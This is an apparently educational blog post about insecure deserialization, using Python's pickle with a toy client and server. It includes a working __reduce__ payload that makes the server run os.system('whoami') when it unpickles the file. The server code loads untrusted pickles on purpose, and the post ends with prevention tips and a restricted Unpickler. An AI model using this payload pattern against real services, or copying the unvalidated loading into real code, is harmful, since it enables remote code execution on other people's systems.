Using Python's Pickling to Explain Insecure Deserialization
Before I go on rambling about what insecure deserialization is, I will explain what serialization and deserialization are.
Serialization is the process of converting an object into a stream of bytes so that it can be stored in memory, a database, or a file, or sent over a network. Do not confuse an object with a simple value. Think of it like this: a plain value such as a number or a string is a single piece of data, whereas an object (a dictionary or a class instance, for example) can bundle several pieces of data of different types. Serialization goes by different names in different languages: it is serialization in Java, pickling in Python, and marshalling in some other languages (Ruby's Marshal module, for example).
Deserialization is the reverse process: converting the serialized bytes back into the original object.
Allow me to demonstrate.
We will be using a library called pickle in Python. If you have a terminal up and running, type the following command.
python3
This will open a Python3 interactive session in the terminal. Now import the pickle library.
>>> import pickle
Next, define an object.
>>> example = {"name": "Shibin", "position": "sec engineer"}
Now that we have defined our object, we will pickle (serialize) it. The pickle library has several functions, all described in the official Python documentation, but here we will be using only two of them: dumps() and loads().
pickle.dumps() is used to pickle (serialize) data. It takes the object to be pickled as its argument and returns the pickled data as a bytes object.
pickle.loads() is used to unpickle (deserialize) data. It takes a bytes object containing pickled data as its argument and returns the reconstructed object.
Let’s pickle the object that we have.
>>> pickle.dumps(example)
This will pickle the data and the output will look somewhat like this (the exact bytes depend on your Python version and the pickle protocol it uses by default):
b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.'
Now to use loads(),
>>> pickle.loads(b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.')
which will give us the data back.
{'name': 'Shibin', 'position': 'sec engineer'}
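As a quick sanity check, here is a minimal sketch of the same round trip written as a script instead of an interactive session. It assumes a Python 3 version that still supports protocol 3, which is the one that produced the bytes shown above. Newer Pythons default to a higher protocol, so the raw bytes can differ while the restored object stays the same.

```python
import pickle

example = {"name": "Shibin", "position": "sec engineer"}

# Pickle the same object with protocol 3 and with the newest protocol available.
blobs = {p: pickle.dumps(example, protocol=p) for p in (3, pickle.HIGHEST_PROTOCOL)}

for protocol, blob in blobs.items():
    restored = pickle.loads(blob)
    # The byte length may vary by protocol, but the restored object should not.
    print(protocol, len(blob), restored == example)
```

Whatever the protocol, loads() should hand back a dictionary equal to the original one.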
Now you might be wondering how this can be enough of a threat to be listed in the OWASP Top 10 vulnerabilities. Insecure deserialization is when an app deserializes the data it receives without validating it in any way, or even checking that it comes from a trusted source.
Again, allow me to demonstrate.
Consider a (shady) Python app which has both a server side (server.py) and a client side (client.py). The client will pickle some data and send it over to the server, and the server will unpickle the data and display it.
The script for client.py is:
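import os
import pickle

def serialize_exploit():
    name = {"name": "shibin", "pos": "sec Engineer"}
    # Open demo.pickle for writing in binary mode and pickle the object into it.
    # dump() writes to the file and returns None, so there is nothing to return.
    with open("demo.pickle", "wb") as f:
        pickle.dump(name, f)  ######

if __name__ == '__main__':
    serialize_exploit()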
(Hmm. Shady app indeed. Why does it import the os library!?) The script has a function serialize_exploit() which defines an object called name. A file called demo.pickle is then opened for writing in binary mode, after which dump() (not dumps()) is used to pickle the object name and write it into the file.
Run the client with python3.
$ python3 client.py
The pickled data is written into the file demo.pickle. Printing the file using cat will show:
?}q(XnameqXshibinqXposqX
sec Engineerqu.%
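cat is not a great way to read pickled data. As a small sketch, the standard library's pickletools module can disassemble a pickle into a readable opcode listing. The dictionary is re-pickled in memory here instead of reading demo.pickle, which is my own simplification so the snippet runs on its own.

```python
import io
import pickle
import pickletools

# Same dictionary the client writes to demo.pickle, pickled in memory instead.
data = pickle.dumps({"name": "shibin", "pos": "sec Engineer"})

# pickletools.dis() writes a human-readable opcode listing to the given stream.
out = io.StringIO()
pickletools.dis(data, out=out)
listing = out.getvalue()

print(listing)
```

The listing shows the strings being pushed and the dictionary being built, ending with a STOP opcode. Nothing in it refers to a function, which is what a harmless pickle should look like.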
The script for server.py is:
import os
import pickle

def insecure_deserialization():
    # Open demo.pickle for reading in binary mode and unpickle whatever is inside.
    with open("demo.pickle", "rb") as f:
        na = pickle.load(f)
    return na

if __name__ == '__main__':
    print(insecure_deserialization())
This script has a function called insecure_deserialization() which opens the file demo.pickle for reading in binary mode. The function load() (not loads()) reads the data and unpickles it. The result is then printed.
Run the server with python3.
$ python3 server.py
It will print the data:
{'name': 'shibin', 'pos': 'sec Engineer'}
So in short, the client pickles (serializes) some data and the server unpickles (deserializes) it without validating it at all. Now begins the interesting part.
Let us focus on client.py. Since there is no validation whatsoever, the server will unpickle whatever the client writes, and the client can pickle anything it likes. So let's modify the script client.py as shown below.
import os
import pickle

class ImVulnerable():  ###
    def __reduce__(self):  ###
        # Tells pickle to call os.system('whoami') when this object is unpickled.
        return (os.system, ('whoami',))  ###

def serialize_exploit():
    name = {"name": "shibin", "pos": "sec Engineer"}  # no longer pickled
    with open("demo.pickle", "wb") as f:
        pickle.dump(ImVulnerable(), f)  ###

if __name__ == '__main__':
    serialize_exploit()
The changed lines are highlighted with hash symbols (###). We define a class ImVulnerable and inside it a method __reduce__(), which pickle calls to find out how the object should be rebuilt. Here it returns the function os.system together with the argument 'whoami', which is a shell command. An instance of this class is then passed as an argument to dump() which, as you are familiar with by now, pickles it and writes it into the file demo.pickle. The content of the file demo.pickle is now:
?cos
system
qXwhoamiq?qRq.%
Note that we have not edited the file server.py so far. Now when I run the server, it reads the demo.pickle file and unpickles the data. Instead of rebuilding some text to print, unpickling calls os.system('whoami'). The command 'whoami' is executed by the server script, so the name of the user running the server shows up, followed by the exit status that os.system() returned!
If this were a real client and server talking over a network, that would be REMOTE CODE EXECUTION, JUST LIKE THAT!
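To see the mechanism without running a shell command, here is a minimal sketch that uses a harmless function in place of os.system. The class name Payload and the choice of os.getcwd are my own assumptions for illustration. The point is that loads() does not return a Payload object at all; it returns whatever the function named in __reduce__() returned.

```python
import os
import pickle
import pickletools

class Payload:
    def __reduce__(self):
        # Harmless stand-in for os.system: call os.getcwd() with no arguments.
        return (os.getcwd, ())

data = pickle.dumps(Payload())

# List the opcode names; REDUCE is the one that calls the function on load.
opcodes = [op.name for op, arg, pos in pickletools.genops(data)]

# Unpickling calls os.getcwd() and returns its result, not a Payload instance.
result = pickle.loads(data)

print(opcodes)
print(result)
```

Note that the side doing the unpickling does not even need the Payload class. The pickle only carries a reference to the function and its arguments.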
How to prevent this:
- DO NOT accept serialized data from untrusted sources.
- Run deserialization code with the least privileges it needs.
- Validate user input. Cyber Security 101: never trust user input!
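To make these points a bit more concrete, here is a minimal sketch (not a complete defense) that overrides find_class() in a subclass of pickle.Unpickler so that no function or class can be looked up while unpickling. The names RestrictedUnpickler and restricted_loads are my own for illustration. It assumes the app only needs plain data such as dictionaries, strings, and numbers.

```python
import io
import os
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever a pickle asks for a global such as os.system.
        # Plain dicts, strings, and numbers never need one, so refuse them all.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Unpickle bytes while refusing every function or class lookup."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class ImVulnerable:
    def __reduce__(self):
        return (os.system, ('whoami',))

safe = pickle.dumps({"name": "shibin", "pos": "sec Engineer"})
malicious = pickle.dumps(ImVulnerable())  # dumps() does not run the command

print(restricted_loads(safe))
try:
    restricted_loads(malicious)
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

With this in place the plain dictionary still loads, while the malicious pickle is rejected before os.system is ever called. If the data really is just dictionaries and strings, a data-only format such as JSON avoids the problem entirely.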
Hope this article was straightforward. :)